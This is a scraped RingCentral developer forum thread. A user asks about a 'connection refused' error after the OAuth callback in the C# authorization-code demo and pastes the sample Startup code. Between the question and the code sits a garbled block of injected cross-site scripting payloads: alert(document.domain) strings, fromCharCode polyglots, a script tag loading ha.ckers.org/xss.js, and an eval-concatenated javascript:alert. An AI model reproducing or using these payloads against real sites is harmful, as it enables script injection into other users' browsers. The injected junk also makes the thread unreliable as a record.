Hi. I am trying to run the Authorization Flow demo.
After I enter my username and password, I get a connection refused error. The uri in the browser looks like the following:
http://localhost:5000/oauth2callback?code=U0pDMTFQM
with a long string for code.
Any hints as to where to go next?
'-alert(document.domain)-'&did='-alert(document.domain)-'. [5:21%11PM,%202/29/2020]%joker:%20 javascript:alert("hellox worldss") <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'> PT SRC="http://ha.ckers.org/xss.js">; < <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 &search=1
'-alert(document.domain)-'&did='-alert(document.domain)-'. [5:21%11PM,%202/29/2020]%joker:%20 javascript:alert("hellox worldss") <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'> PT SRC="http://ha.ckers.org/xss.js">; < <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 &search=1 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//-->">'>&submit-frmGoogleWeb=Web+Search
hellox worldss
...
lol "> "> "> "> <% foo>
exp/*
a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e); PT SRC="
http://ha.ckers.org/xss.js">; TESTHTML5FORMACTION crosssitespt
|
I just copied the C# example from the ringcentral site. The only thing I changed was the Client ID and Secret:
using System.Linq; using Microsoft.AspNetCore.Builder; using Microsoft.AspNetCore.Hosting; using Microsoft.AspNetCore.Http; using Microsoft.Extensions.DependencyInjection; using RingCentral; using Newtonsoft.Json; using Microsoft.Extensions.Hosting; namespace RCAuthFlowV2 { public class Startup { private const string RINGCENTRAL_CLIENT_ID = "XXXXXXXXXX"; private const string RINGCENTRAL_CLIENT_SECRET = "YYYYYYYYYYYYYYYYYYY"; private const string RINGCENTRAL_SERVER_URL = "https://platform.devtest.ringcentral.com"; private const string RINGCENTRAL_REDIRECT_URL = "http://localhost:5000/oauth2callback"; private const string SESSION_TOKEN_KEY = "rc-token"; public void ConfigureServices(IServiceCollection services) { services.AddMvc().AddSessionStateTempDataProvider(); services.AddSession(); } private static string Html(string body) { return $@"<!doctype html><html><body>{body}</body></html>"; } public void Configure(IApplicationBuilder app, IWebHostEnvironment env) { if (env.IsDevelopment()) app.UseDeveloperExceptionPage(); app.UseSession(); app.Run(async (context) => { var rc = new RestClient(RINGCENTRAL_CLIENT_ID, RINGCENTRAL_CLIENT_SECRET, RINGCENTRAL_SERVER_URL); var tokenString = context.Session.GetString(SESSION_TOKEN_KEY); if (tokenString != null) { rc.token = JsonConvert.DeserializeObject<TokenInfo>(tokenString); } else if (context.Request.Path != "/oauth2callback") { var oauthUri = rc.AuthorizeUri(RINGCENTRAL_REDIRECT_URL); await context.Response.WriteAsync( Html($"<h2>RingCentral Authorization Code Flow Authentication</h2><a href=\"{oauthUri}\">Login RingCentral Account</a>")); return; } switch (context.Request.Path) { case "/": await context.Response.WriteAsync(Html(@"<b><a href=""/logout"">Logout</a></b> <h2>Call APIs</h2> <ul> <li><a href=""/test?api=extension"" target=""_blank"">Read Extension Info</a></li> <li><a href=""/test?api=extension-call-log"" target=""_blank"">Read Extension Call Log</a></li> <li><a href=""/test?api=account-call-log"" target=""_blank"">Read Account Call Log</a></li> </ul>")); break; case "/oauth2callback": context.Request.Query.TryGetValue("code", out var codes); var code = codes.First(); await rc.Authorize(code, RINGCENTRAL_REDIRECT_URL); context.Session.SetString(SESSION_TOKEN_KEY, JsonConvert.SerializeObject(rc.token)); context.Response.Redirect("/"); break; case "/test": context.Request.Query.TryGetValue("api", out var apis); var api = apis.First(); var result = ""; switch (api) { case "extension": result = await rc.Get<string>("/restapi/v1.0/account/~/extension"); break; case "extension-call-log": result = await rc.Get<string>("/restapi/v1.0/account/~/extension/~/call-log"); break; case "account-call-log": result = await rc.Get<string>("/restapi/v1.0/account/~/call-log"); break; } await context.Response.WriteAsync(Html($"<pre>{result}</pre>")); break; case "/logout": await rc.Revoke(); context.Session.Remove(SESSION_TOKEN_KEY); context.Response.Redirect("/"); break; default: context.Response.StatusCode = 404; break; } }); } } }
A new Community is coming to RingCentral!
Posts are currently read-only as we transition into our new platform.We thank you for your patience
during this downtime.
Try Workflow Builder
Did you know you can easily automate tasks like responding to SMS, team messages, and more? Plus it's included with RingCentral Video and RingEX plans!Try RingCentral Workflow Builder